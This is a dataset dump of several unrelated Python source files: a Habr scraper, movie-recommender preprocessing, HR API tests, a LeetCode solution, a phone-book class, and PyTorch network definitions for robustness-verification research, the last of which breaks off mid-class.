MongoClient\r\nimport re\r\nimport datetime as dt\r\nimport time\r\n\r\n\r\nclass HabrParser:\r\n domain = 'https://habr.com'\r\n start_url = 'https://habr.com/ru/top/daily'\r\n\r\n def __init__(self):\r\n self.visited_urls = set()\r\n self.post_links = set()\r\n self.posts_data = []\r\n self.headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36\"}\r\n def parse_rows(self, url = start_url):\r\n while url:\r\n if url in self.visited_urls:\r\n break\r\n\r\n response = requests.get(url, headers = self.headers)\r\n time.sleep(0.01)\r\n self.visited_urls.add(url)\r\n soup = BeautifulSoup(response.text, 'lxml')\r\n url = self.get_next_page(soup)\r\n self.search_post_links(soup)\r\n\r\n def get_next_page(self, soup: BeautifulSoup) -> str:\r\n ul = soup.find('ul', attrs = {'class': 'arrows-pagination'})\r\n a = ul.find('a', attrs = {'id': 'next_page'})\r\n next_page_link = f'{self.domain}{a.get(\"href\")}' if a and a.get(\"href\") else None\r\n return next_page_link\r\n\r\n def 
search_post_links(self, soup: BeautifulSoup) -> List[str]:\r\n posts_list = soup.find('div', attrs = {'class': 'posts_list'})\r\n posts = posts_list.find_all('article', attrs = {'class': 'post_preview'})\r\n links = {item.find(\"a\", attrs = {\"class\": \"post__title_link\"}).get(\"href\") for item in posts}\r\n self.post_links.update(links)\r\n\r\n\r\n def post_page_parse(self):\r\n\r\n for url in list(self.post_links):\r\n if url in self.visited_urls:\r\n continue\r\n response = requests.get( url, headers=self.headers )\r\n time.sleep(1)\r\n while response.status_code != 200:\r\n response = requests.get( url, headers=self.headers )\r\n soup = BeautifulSoup(response.text, 'lxml')\r\n self.visited_urls.add( url )\r\n\r\n pd = {}\r\n pd['url'] = url\r\n pd.update(self.get_post_data(soup))\r\n self.posts_data.append(pd)\r\n\r\n def get_post_data(self, soup: BeautifulSoup):\r\n\r\n result = {}\r\n #total blocks\r\n wrapper = soup.find('div', attrs = {'class': {'post_wrapper', 'post__wrapper'}})\r\n author_block = soup.find( 'div', attrs={'class': 'author-panel'})\r\n tags_block = wrapper.find( 'dl', attrs={'class': 'post__tags'})\r\n hubs_block = wrapper.find( 'dl', attrs={'class': 'post__tags'} )\r\n\r\n #title\r\n result['title'] = wrapper.find('span', attrs={'class': 'post__title-text'}).text\r\n #author\r\n author_block_spec = author_block.find( 'div', attrs={'class': 'user-info__about'} )\r\n author_info = author_block_spec.find('a', attrs={'class': 'user-info__fullname'})\r\n if not author_info:\r\n author_info = author_block_spec.find('a', attrs={'class': 'user-info__nickname'})\r\n result['author'] = author_info.text\r\n result['author_url'] = author_info.get('href')\r\n\r\n #tags\r\n tags_block_spec = tags_block.find('dd', attrs={'class': 'post__tags-list'})\r\n tags_info = tags_block_spec.find_all('li', attrs={'class': 'inline-list__item_tag'})\r\n tags = set((tag.find('a', attrs = {'class': 'post__tag', 'rel': 'tag'}).text,\r\n tag.find('a', attrs = {'class': 'post__tag', 'rel': 'tag'}).get(\"href\"))\r\n for tag in tags_info)\r\n result['tags'] = tags\r\n\r\n #hubs\r\n hubs_block_spec = hubs_block.find_next('dd', attrs={'class': 'post__tags-list'})\r\n hubs_info = hubs_block_spec.find_all('li', attrs={'class': 'inline-list__item_tag'})\r\n hubs = set((hub.find('a', attrs={'class': 'post__tag', 'rel': 'tag'}).text,\r\n hub.find('a', attrs={'class': 'post__tag', 'rel': 'tag'}).get(\"href\"))\r\n for hub in hubs_info)\r\n result['hubs'] = hubs\r\n return result\r\n\r\n def parse(self):\r\n self.parse_rows()\r\n self.post_page_parse()\r\n\r\nif __name__ == '__main__':\r\n parser = HabrParser()\r\n parser.parse()\r\n\r\n","repo_name":"EkaterinaArseneva/data_mining_EA","sub_path":"lessons1-4/ht3_parser.py","file_name":"ht3_parser.py","file_ext":"py","file_size_in_byte":4874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14362004817","text":"import pandas as pd\nimport json\nimport numpy as np\nimport spacy\nfrom nltk.stem import PorterStemmer\nfrom nltk.tokenize import word_tokenize\n\ndef fetch_name_from_dict(obj):\n L = []\n obj = json.loads(obj)\n for info in obj:\n L.append(info['name'])\n return L\n\ndef fetch_director(obj):\n L = []\n obj = json.loads(obj)\n for info in obj:\n if info['job']=='Director':\n L.append(info['name'])\n return L\n\ndef top_4_cast(obj):\n L = []\n counter = 0\n obj = json.loads(obj)\n for info in obj:\n if counter < 4:\n L.append(info['name'])\n counter += 1\n else:\n break\n return L\n\ndef 
stemming(sent):\n ps = PorterStemmer()\n stem_tokens = [ps.stem(token) for token in sent.split()]\n stem_sent = \" \".join(stem_tokens)\n return stem_sent\n\ndef lemmatize(sents): # taking around half a minute\n nlp = spacy.load(\"en_core_web_sm\")\n docs = sents.tolist()\n lem_sents = []\n for doc in nlp.pipe(docs, batch_size=512, n_process=3, disable=[\"parser\", \"ner\"]):\n lem_tokens = [token.lemma_ for token in doc]\n lem_sent = \" \".join(lem_tokens)\n lem_sents.append(lem_sent)\n return lem_sents\n\ndef preprocess(df):\n df = df.rename(columns={'title_x':'title'})\n # # # feature to consider\n # # genres\n # # id\n # # keywords\n # # original_language\n # # overview\n # # title\n # # cast\n # # crew\n df = df[['genres','id','keywords','original_language','overview','title','cast','crew']]\n df = df.dropna().reset_index(drop=True)\n\n df['genres'] = df['genres'].apply(fetch_name_from_dict)\n df['keywords'] = df['keywords'].apply(fetch_name_from_dict)\n df['crew'] = df['crew'].apply(fetch_director)\n df = df.rename(columns={'crew':'director'})\n df['cast'] = df['cast'].apply(top_4_cast)\n \n ### removing spaces ###\n df['genres'] = df['genres'].apply(lambda x:[a.replace(\" \",\"\") for a in x])\n df['cast'] = df['cast'].apply(lambda x:[a.replace(\" \",\"\") for a in x])\n df['director'] = df['director'].apply(lambda x:[a.replace(\" \",\"\") for a in x])\n df['keywords'] = df['keywords'].apply(lambda x:[a.replace(\" \",\"\") for a in x])\n \n ### Lemmatizing/Stemming \"overview\" ###\n # df['overview'] = lemmatize(df.overview)\n df['overview'] = df['overview'].apply(stemming)\n\n ### creating tag out of features ###\n df['overview'] = df['overview'].apply(lambda x: [x])\n df['original_language'] = df['original_language'].apply(lambda x:[x])\n df['tags'] = df['overview'] + df['genres'] + df['keywords'] + df['original_language'] + df['cast'] + df['director']\n df['tags'] = df['tags'].apply(lambda x: \" \".join(x))\n df['tags'] = df['tags'].apply(lambda x: x.lower())\n df = df[['id','title','tags']]\n \n return df\n\n\n\n","repo_name":"shifu-dev/Content-Based-Movie-Recommender-System","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"469099000","text":"# 创建测试类\n# 编写测试函数\nimport logging\nimport unittest\nimport app\nfrom api.employee_api import TestEmployeeApi\nfrom api.login_api import LoginApi\nfrom utiles import assert_comment\n\n\nclass TestIhrmEmployee3(unittest.TestCase):\n def setUp(self):\n self.emp_api = TestEmployeeApi()\n self.login_api = LoginApi()\n\n def test_01_login(self):\n response = self.login_api.login({\"mobile\": \"13800000002\", \"password\": \"123456\"},\n {\"Content-Type\": \"application/json\"})\n\n logging.info(\"登录的结果为:{}\".format(response.json()))\n assert_comment(200, 10000, True, \"操作成功\", response, self)\n\n # 获取令牌\n token = response.json().get('data')\n\n headers = {\"Content-Type\": \"application/json\", \"Authorization\": \"Bearer \" + token}\n app.HEADERS = headers\n\n\n def test_02_add_emp(self):\n response = self.emp_api.add_emp(app.HEADERS, \"小偷家族77\", \"17512345677\")\n logging.info(\"添加员工的结果是:{}\".format(response.json()))\n assert_comment(200, 10000, True, \"操作成功\", response, self)\n emp_id = response.json().get(\"data\").get(\"id\")\n app.EMP_ID = emp_id\n\n\n def test_03_query_emp(self):\n response = self.emp_api.query_emp(app.EMP_ID, app.HEADERS)\n 
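# app.EMP_ID was stored by test_02_add_emp above, so these tests rely on unittest's name-ordered execution\n 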
logging.info(\"查询员工的结果是:{}\".format(response.json()))\n assert_comment(200, 10000, True, \"操作成功\", response, self)\n\n def test_04_mpdify_emp(self):\n response = self.emp_api.modify_emp(app.EMP_ID, app.HEADERS,\"古力娜扎\")\n logging.info(\"修改员工的结果为:{}\".format(response.json()))\n assert_comment(200, 10000, True, \"操作成功\", response, self)\n\n def test_05_delete_emp(self):\n response = self.emp_api.delete_emp(app.EMP_ID, app.HEADERS)\n logging.info(\"删除员工的结果为:{}\".format(response.json()))\n assert_comment(200, 10000, True, \"操作成功\", response, self)\n","repo_name":"tiantiankaixin2020/test_ihrm_priject","sub_path":"script/test_ihrm_employee_3.py","file_name":"test_ihrm_employee_3.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18658061243","text":"import math\nclass Solution:\n def getPermutation(self, n, k):\n num = [str(i) for i in range(1, n+1)]\n res = \"\"\n n -= 1\n while n > -1:\n t = math.factorial(n) #数量\n loc = math.ceil(k / t) -1\n res += num[loc]\n num.pop(loc)\n k %= t\n n -= 1\n return res\n\nprint( )","repo_name":"Francis1998/leetcode","sub_path":"14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"11532582113","text":"from Contact import Contact\nimport json\n\nclass PhoneBook:\n contacts = []\n \n @property\n def size(self):\n return len(self.contacts)\n\n def load(self, file: str) -> None:\n \"\"\"Reads the phone book from a file\"\"\"\n with open(file, \"r\") as f:\n self.contacts = json.loads(f.read())\n \n def save(self, destination: str) -> None:\n \"\"\"Saves the phone book as a dictionary to a file designated by the user\"\"\"\n with open(destination, \"w\") as f:\n f.write(json.dumps(self.contacts, indent=4))\n\n def add_contact(self, *people_to_add: Contact) -> None:\n \"\"\"Add a contact to a phone book\"\"\"\n for person in people_to_add:\n personal_information = {\n \"Name\": person.name.capitalize(),\n \"Lastname\": person.lastname.capitalize(),\n \"Phone number\": person.phone_number\n }\n self.contacts.append(personal_information)\n\n def del_contact(self, name: str, lastname: str) -> None:\n \"\"\"Delete a contact from a phone book\"\"\"\n for i, person in enumerate(self.contacts):\n if (person['Name'], person['Lastname']) == (name.capitalize(), lastname.capitalize()):\n self.contacts.pop(i)\n print(f\"\\n{name.capitalize()} {lastname.capitalize()} deleted.\\n\")\n break\n else:\n print(f\"\\nNo {name} {lastname} found in the Phone book.\\n\")\n\n def __len__(self) -> int:\n return self.size\n\n def __str__(self) -> str:\n strng = \"\"\n for contact in self.contacts:\n for key, value in contact.items():\n strng = f\"{strng}{key}: {value}\\t\\t\"\n strng = f\"{strng}\\n\"\n return strng\n\n def __repr__(self) -> str:\n return f\"PhoneBook class: {self.contacts}\"","repo_name":"veern/Learning-Python","sub_path":"PhoneBook/PhoneBook.py","file_name":"PhoneBook.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"31371294543","text":"import gzip\nimport typing\nfrom os.path import exists\nfrom typing import List, Optional, Sequence, Tuple, Type\n\nimport onnx # type: ignore[import]\nimport torch\nfrom bunch import Bunch # type: ignore[import]\nimport numpy as np\n\nfrom torch import nn as nn\n\nfrom src.concrete_layers.basic_block import 
BasicBlock\nfrom src.concrete_layers.pad import Pad\nfrom src.utilities.onnx_loader import ConvertModel\n\n\ndef lecture_network_small() -> nn.Sequential:\n net = nn.Sequential(\n *[\n nn.Linear(in_features=2, out_features=2),\n nn.ReLU(),\n nn.Linear(in_features=2, out_features=1),\n ]\n )\n net[0].weight.data = torch.ones_like(net[0].weight.data)\n net[0].weight.data[1, 1] = -1.\n net[0].bias.data = torch.zeros_like(net[0].bias.data)\n\n net[2].weight.data = torch.ones_like(net[2].weight.data)\n net[2].bias.data[0] = -0.5\n return net\n\n\ndef lecture_network() -> nn.Sequential:\n net = nn.Sequential(\n *[\n nn.Linear(in_features=2, out_features=2),\n nn.ReLU(),\n nn.Linear(in_features=2, out_features=2),\n nn.ReLU(),\n nn.Linear(in_features=2, out_features=2)\n ]\n )\n\n net[0].weight.data = torch.ones_like(net[0].weight.data)\n net[0].weight.data[1, 1] = -1.\n net[0].bias.data = torch.zeros_like(net[0].bias.data)\n\n net[2].weight.data = torch.ones_like(net[2].weight.data)\n net[2].weight.data[1, 1] = -1.\n net[2].bias.data = torch.tensor([-0.5, 0])\n\n net[4].weight.data = torch.ones_like(net[4].weight.data)\n net[4].weight.data[0, 0] = -1.\n net[4].weight.data[1, 0] = 0\n net[4].bias.data = torch.tensor([3., 0])\n return net\n\ndef mnist_conv_tiny() -> nn.Sequential:\n return nn.Sequential(\n *[\n nn.Conv2d(in_channels=1, out_channels=4, kernel_size=4, stride=4),\n nn.ReLU(),\n nn.Conv2d(in_channels=4, out_channels=8, kernel_size=4, stride=2),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(in_features=8 * 2 * 2, out_features=50),\n nn.ReLU(),\n nn.Linear(in_features=50, out_features=10),\n ]\n )\n\n\ndef mnist_conv_small() -> nn.Sequential:\n return nn.Sequential(\n *[\n nn.Conv2d(in_channels=1, out_channels=16, kernel_size=4, stride=2),\n nn.ReLU(),\n nn.Conv2d(in_channels=16, out_channels=32, kernel_size=4, stride=2),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(in_features=32 * 5 * 5, out_features=100),\n nn.ReLU(),\n nn.Linear(in_features=100, out_features=10),\n ]\n )\n\n\ndef mnist_conv_sigmoid_small() -> nn.Sequential:\n return nn.Sequential(\n *[\n nn.Conv2d(in_channels=1, out_channels=16, kernel_size=4, stride=2),\n nn.Sigmoid(),\n nn.Conv2d(in_channels=16, out_channels=32, kernel_size=4, stride=2),\n nn.Sigmoid(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(in_features=32 * 5 * 5, out_features=100),\n nn.Sigmoid(),\n nn.Linear(in_features=100, out_features=10),\n ]\n )\n\n\ndef mnist_conv_big() -> nn.Sequential:\n return nn.Sequential(\n *[\n nn.Conv2d(\n in_channels=1, out_channels=32, kernel_size=3, stride=1, padding=1\n ),\n nn.ReLU(),\n nn.Conv2d(\n in_channels=32, out_channels=32, kernel_size=4, stride=2, padding=1\n ),\n nn.ReLU(),\n nn.Conv2d(\n in_channels=32, out_channels=64, kernel_size=3, stride=1, padding=1\n ),\n nn.ReLU(),\n nn.Conv2d(\n in_channels=64, out_channels=64, kernel_size=4, stride=2, padding=1\n ),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(in_features=64 * 7 * 7, out_features=512),\n nn.ReLU(),\n nn.Linear(in_features=512, out_features=512),\n nn.ReLU(),\n nn.Linear(in_features=512, out_features=10),\n ]\n )\n\n\ndef mnist_conv_super() -> nn.Sequential:\n return nn.Sequential(\n *[\n nn.Conv2d(\n in_channels=1, out_channels=32, kernel_size=3, stride=1, padding=0\n ),\n nn.ReLU(),\n nn.Conv2d(\n in_channels=32, out_channels=32, kernel_size=4, stride=1, padding=0\n ),\n nn.ReLU(),\n nn.Conv2d(\n in_channels=32, out_channels=64, kernel_size=3, stride=1, padding=0\n ),\n nn.ReLU(),\n 
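# shape note: the stride-1, no-padding convs shrink the 28x28 input to 26, 23, then 21 here;\n # the 4x4 conv below gives 18, which is why the first linear layer expects 64 * 18 * 18 inputs\n 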
nn.Conv2d(\n in_channels=64, out_channels=64, kernel_size=4, stride=1, padding=0\n ),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(in_features=64 * 18 * 18, out_features=512),\n nn.ReLU(),\n nn.Linear(in_features=512, out_features=512),\n nn.ReLU(),\n nn.Linear(in_features=512, out_features=10),\n ]\n )\n\n\ndef mnist_a_b(a: int, b: int) -> nn.Sequential:\n layers = [nn.Linear(28 * 28, b), nn.ReLU()]\n for __ in range(a - 1):\n layers += [\n nn.Linear(b, b),\n nn.ReLU(),\n ]\n layers += [nn.Linear(b, 10), nn.ReLU()]\n return nn.Sequential(*layers)\n\n\ndef mnist_sig_a_b(a: int, b: int) -> nn.Sequential:\n layers = [nn.Linear(28 * 28, b), nn.Sigmoid()]\n for __ in range(a - 1):\n layers += [\n nn.Linear(b, b),\n nn.Sigmoid(),\n ]\n layers += [nn.Linear(b, 10), nn.Sigmoid()]\n return nn.Sequential(*layers)\n\n\ndef mnist_vnncomp_a_b(a: int, b: int) -> nn.Sequential:\n layers = [nn.Flatten(start_dim=1, end_dim=-1), nn.Linear(28 * 28, b), nn.ReLU()]\n for __ in range(a - 1):\n layers += [\n nn.Linear(b, b),\n nn.ReLU(),\n ]\n layers += [nn.Linear(b, 10)]\n return nn.Sequential(*layers)\n\n\ndef cifar10_conv_small() -> nn.Sequential:\n return nn.Sequential(\n *[\n nn.Conv2d(in_channels=3, out_channels=16, kernel_size=4, stride=2),\n nn.ReLU(),\n nn.Conv2d(in_channels=16, out_channels=32, kernel_size=4, stride=2),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(in_features=32 * 6 * 6, out_features=100),\n nn.ReLU(),\n nn.Linear(in_features=100, out_features=10),\n ]\n )\n\n\ndef cifar10_cnn_A() -> nn.Sequential:\n return nn.Sequential(\n *[\n nn.Conv2d(\n in_channels=3, out_channels=16, kernel_size=4, stride=2, padding=1\n ),\n nn.ReLU(),\n nn.Conv2d(\n in_channels=16, out_channels=32, kernel_size=4, stride=2, padding=1\n ),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(in_features=32 * 8 * 8, out_features=100),\n nn.ReLU(),\n nn.Linear(in_features=100, out_features=10),\n ]\n )\n\ndef cifar10_cnn_B():\n return nn.Sequential(\n Pad((1,2,1,2)),\n nn.Conv2d(3, 32, (5,5), stride=2, padding=0),\n nn.ReLU(),\n nn.Conv2d(32, 128, (4,4), stride=2, padding=1),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(8192, 250),\n nn.ReLU(),\n nn.Linear(250, 10),\n )\n\n\ndef mnist_cnn_A():\n return nn.Sequential(\n nn.Conv2d(1, 16, (4,4), stride=2, padding=1),\n nn.ReLU(),\n nn.Conv2d(16, 32, (4,4), stride=2, padding=1),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(1568, 100),\n nn.ReLU(),\n nn.Linear(100, 10),\n )\n\ndef cifar10_base() -> nn.Sequential:\n return nn.Sequential(\n nn.Conv2d(3, 8, 4, stride=2, padding=1),\n nn.ReLU(),\n nn.Conv2d(8, 16, 4, stride=2, padding=1),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(1024, 100),\n nn.ReLU(),\n nn.Linear(100, 10),\n )\n\n\ndef cifar10_wide() -> nn.Sequential:\n return nn.Sequential(\n nn.Conv2d(3, 16, 4, stride=2, padding=1),\n nn.ReLU(),\n nn.Conv2d(16, 32, 4, stride=2, padding=1),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(32 * 8 * 8, 100),\n nn.ReLU(),\n nn.Linear(100, 10),\n )\n\n\ndef cifar10_deep() -> nn.Sequential:\n return nn.Sequential(\n nn.Conv2d(3, 8, 4, stride=2, padding=1),\n nn.ReLU(),\n nn.Conv2d(8, 8, 3, stride=1, padding=1),\n nn.ReLU(),\n nn.Conv2d(8, 8, 3, stride=1, padding=1),\n nn.ReLU(),\n nn.Conv2d(8, 8, 4, stride=2, padding=1),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(8 * 8 * 8, 100),\n nn.ReLU(),\n nn.Linear(100, 10),\n )\n\n\ndef cifar10_2_255_simplified() -> nn.Sequential:\n return 
nn.Sequential(\n nn.Conv2d(3, 32, 3, stride=1, padding=1),\n nn.ReLU(),\n nn.Conv2d(32, 32, 4, stride=2, padding=1),\n nn.ReLU(),\n nn.Conv2d(32, 128, 4, stride=2, padding=1),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(128 * 8 * 8, 250),\n nn.ReLU(),\n nn.Linear(250, 10),\n )\n\n\ndef cifar10_8_255_simplified() -> nn.Sequential:\n return nn.Sequential(\n nn.Conv2d(3, 32, 5, stride=2, padding=2),\n nn.ReLU(),\n nn.Conv2d(32, 128, 4, stride=2, padding=1),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(128 * 8 * 8, 250),\n nn.ReLU(),\n nn.Linear(250, 10),\n )\n\n\ndef cifar10_conv_big() -> nn.Sequential:\n return nn.Sequential(\n *[\n nn.Conv2d(\n in_channels=3, out_channels=32, kernel_size=3, stride=1, padding=1\n ),\n nn.ReLU(),\n nn.Conv2d(\n in_channels=32, out_channels=32, kernel_size=4, stride=2, padding=1\n ),\n nn.ReLU(),\n nn.Conv2d(\n in_channels=32, out_channels=64, kernel_size=3, stride=1, padding=1\n ),\n nn.ReLU(),\n nn.Conv2d(\n in_channels=64, out_channels=64, kernel_size=4, stride=2, padding=1\n ),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(in_features=64 * 8 * 8, out_features=512),\n nn.ReLU(),\n nn.Linear(in_features=512, out_features=512),\n nn.ReLU(),\n nn.Linear(in_features=512, out_features=10),\n ]\n )\n\n\ndef getShapeConv(\n in_shape: Tuple[int, int, int],\n conv_shape: Tuple[int, ...],\n stride: int = 1,\n padding: int = 0,\n) -> Tuple[int, int, int]:\n inChan, inH, inW = in_shape\n outChan, kH, kW = conv_shape[:3]\n\n outH = 1 + int((2 * padding + inH - kH) / stride)\n outW = 1 + int((2 * padding + inW - kW) / stride)\n return (outChan, outH, outW)\n\n\nclass ResNet(nn.Sequential):\n def __init__(\n self,\n block: Type[BasicBlock],\n in_ch: int = 3,\n num_stages: int = 1,\n num_blocks: int = 2,\n num_classes: int = 10,\n in_planes: int = 64,\n bn: bool = True,\n last_layer: str = \"avg\",\n in_dim: int = 32,\n stride: Optional[Sequence[int]] = None,\n ):\n layers: List[nn.Module] = []\n self.in_planes = in_planes\n if stride is None:\n stride = (num_stages + 1) * [2]\n\n layers.append(\n nn.Conv2d(\n in_ch,\n self.in_planes,\n kernel_size=3,\n stride=stride[0],\n padding=1,\n bias=not bn,\n )\n )\n\n _, _, in_dim = getShapeConv(\n (in_ch, in_dim, in_dim), (self.in_planes, 3, 3), stride=stride[0], padding=1\n )\n\n if bn:\n layers.append(nn.BatchNorm2d(self.in_planes))\n\n layers.append(nn.ReLU())\n\n for s in stride[1:]:\n block_layers, in_dim = self._make_layer(\n block,\n self.in_planes * 2,\n num_blocks,\n stride=s,\n bn=bn,\n kernel=3,\n in_dim=in_dim,\n )\n layers.append(block_layers)\n\n if last_layer == \"avg\":\n layers.append(nn.AvgPool2d(4))\n layers.append(nn.Flatten())\n layers.append(\n nn.Linear(\n self.in_planes * (in_dim // 4) ** 2 * block.expansion, num_classes\n )\n )\n elif last_layer == \"dense\":\n layers.append(nn.Flatten())\n layers.append(\n nn.Linear(self.in_planes * block.expansion * in_dim**2, 100)\n )\n layers.append(nn.ReLU())\n layers.append(nn.Linear(100, num_classes))\n else:\n exit(\"last_layer type not supported!\")\n\n super(ResNet, self).__init__(*layers)\n\n def _make_layer(\n self,\n block: Type[BasicBlock],\n planes: int,\n num_layers: int,\n stride: int,\n bn: bool,\n kernel: int,\n in_dim: int,\n ) -> Tuple[nn.Sequential, int]:\n strides = [stride] + [1] * (num_layers - 1)\n cur_dim: int = in_dim\n layers: List[nn.Module] = []\n for stride in strides:\n layer = block(self.in_planes, planes, stride, bn, kernel, in_dim=cur_dim)\n layers.append(layer)\n cur_dim = 
layer.out_dim\n layers.append(nn.ReLU())\n self.in_planes = planes * block.expansion\n return nn.Sequential(*layers), cur_dim\n\n\ndef resnet2b(bn: bool = False) -> nn.Sequential:\n return ResNet(\n BasicBlock, num_stages=1, num_blocks=2, in_planes=8, bn=bn, last_layer=\"dense\"\n )\n\n\ndef resnet2b2(bn: bool = False, in_ch: int = 3, in_dim: int = 32) -> nn.Sequential:\n return ResNet(\n BasicBlock,\n in_ch=in_ch,\n num_stages=2,\n num_blocks=1,\n in_planes=16,\n bn=bn,\n last_layer=\"dense\",\n stride=[2, 2, 2],\n )\n\n\ndef resnet4b(bn: bool = False) -> nn.Sequential:\n return ResNet(\n BasicBlock, num_stages=2, num_blocks=2, in_planes=8, bn=bn, last_layer=\"dense\"\n )\n\n\ndef resnet4b1(bn: bool = False) -> nn.Sequential:\n return ResNet(\n BasicBlock,\n in_ch=3,\n num_stages=4,\n num_blocks=1,\n in_planes=16,\n bn=bn,\n last_layer=\"dense\",\n stride=[1, 1, 2, 2, 2],\n )\n\n\ndef resnet4b2(bn: bool = False) -> nn.Sequential:\n return ResNet(\n BasicBlock,\n in_ch=3,\n num_stages=4,\n num_blocks=1,\n in_planes=16,\n bn=bn,\n last_layer=\"dense\",\n stride=[2, 2, 2, 1, 1],\n )\n\n\ndef resnet3b2(bn: bool = False) -> nn.Sequential:\n return ResNet(\n BasicBlock,\n in_ch=3,\n num_stages=3,\n num_blocks=1,\n in_planes=16,\n bn=bn,\n last_layer=\"dense\",\n stride=[2, 2, 2, 2],\n )\n\n\ndef resnet9b(bn: bool = False) -> nn.Sequential:\n return ResNet(\n BasicBlock,\n in_ch=3,\n num_stages=3,\n num_blocks=3,\n in_planes=16,\n bn=bn,\n last_layer=\"dense\",\n )\n\ndef ConvMedBig(dataset, bn=False, bn2=False, device=\"cuda\"):\n in_ch, in_dim, n_class = get_dataset_info(dataset)\n return myNet(device, dataset, n_class, in_dim, in_ch, conv_widths=[2,2,8], kernel_sizes=[3,4,4],\n linear_sizes=[250], strides=[1,2,2], paddings=[1, 1, 1], net_dim=None, bn=bn, bn2=bn2)\n\ndef ConvMed(dataset, bn=False, bn2=False, device=\"cuda\"):\n in_ch, in_dim, n_class = get_dataset_info(dataset)\n return myNet(device, dataset, n_class, in_dim, in_ch, conv_widths=[2,4], kernel_sizes=[5,4],\n linear_sizes=[100], strides=[2,2], paddings=[2,1], net_dim=None, bn=bn, bn2=bn2)\n\ndef ConvMed2(dataset, bn=False, bn2=False, device=\"cuda\"):\n in_ch, in_dim, n_class = get_dataset_info(dataset)\n return myNet(device, dataset, n_class, in_dim, in_ch, conv_widths=[2,8], kernel_sizes=[5,4],\n linear_sizes=[250], strides=[2,2], paddings=[2,1], net_dim=None, bn=bn, bn2=bn2)\n\ndef ConvMed_tiny(dataset, bn=False, bn2=False, device=\"cuda\"):\n in_ch, in_dim, n_class = get_dataset_info(dataset)\n return myNet(device, dataset, n_class, in_dim, in_ch, conv_widths=[1,2], kernel_sizes=[5,4],\n linear_sizes=[50], strides=[2,2], paddings=[1,1], net_dim=None, bn=bn, bn2=bn2)\n\nclass myNet(nn.Module):\n def __init__(self, device, dataset, n_class=10, input_size=32, input_channel=3, conv_widths=None,\n kernel_sizes=None, linear_sizes=None, depth_conv=None, paddings=None, strides=None,\n dilations=None, pool=False, net_dim=None, bn=False, bn2=False, max=False, scale_width=True):\n super(myNet, self).__init__()\n if kernel_sizes is None:\n kernel_sizes = [3]\n if conv_widths is None:\n conv_widths = [2]\n if linear_sizes is None:\n linear_sizes = [200]\n if paddings is None:\n paddings = [1]\n if strides is None:\n strides = [2]\n if dilations is None:\n dilations = [1]\n if net_dim is None:\n net_dim = input_size\n\n if len(conv_widths) != len(kernel_sizes):\n kernel_sizes = len(conv_widths) * [kernel_sizes[0]]\n if len(conv_widths) != len(paddings):\n paddings = len(conv_widths) * [paddings[0]]\n if len(conv_widths) != len(strides):\n 
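# a single value here is broadcast to every conv layer, matching the kernel/padding handling above\n 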
strides = len(conv_widths) * [strides[0]]\n if len(conv_widths) != len(dilations):\n dilations = len(conv_widths) * [dilations[0]]\n\n self.n_class=n_class\n self.input_size=input_size\n self.input_channel=input_channel\n self.conv_widths=conv_widths\n self.kernel_sizes=kernel_sizes\n self.paddings=paddings\n self.strides=strides\n self.dilations = dilations\n self.linear_sizes=linear_sizes\n self.depth_conv=depth_conv\n self.net_dim = net_dim\n self.bn=bn\n self.bn2 = bn2\n self.max=max\n\n layers = []\n\n N = net_dim\n n_channels = input_channel\n self.dims = [(n_channels,N,N)]\n\n for width, kernel_size, padding, stride, dilation in zip(conv_widths, kernel_sizes, paddings, strides, dilations):\n if scale_width:\n width *= 16\n N = int(np.floor((N + 2 * padding - dilation * (kernel_size - 1) - 1) / stride + 1))\n layers += [nn.Conv2d(n_channels, int(width), kernel_size, stride=stride, padding=padding, dilation=dilation)]\n if self.bn:\n layers += [nn.BatchNorm2d(int(width))]\n if self.max:\n layers += [nn.MaxPool2d(int(width))]\n layers += [nn.ReLU()] # torch's ReLU takes no shape argument\n n_channels = int(width)\n self.dims += 2*[(n_channels,N,N)]\n\n if depth_conv is not None:\n layers += [nn.Conv2d(n_channels, depth_conv, 1, stride=1, padding=0),\n nn.ReLU()]\n n_channels = depth_conv\n self.dims += 2*[(n_channels,N,N)]\n\n if pool:\n layers += [nn.AdaptiveAvgPool2d(1)] # torch has no nn.GlobalAvgPool2d\n self.dims += 2 * [(n_channels, 1, 1)]\n N=1\n\n layers += [nn.Flatten()]\n N = n_channels * N ** 2\n self.dims += [(N,)]\n\n for width in linear_sizes:\n if width == 0:\n continue\n layers += [nn.Linear(int(N), int(width))]\n if self.bn2:\n layers += [nn.BatchNorm1d(int(width))]\n layers += [nn.ReLU()]\n N = width\n 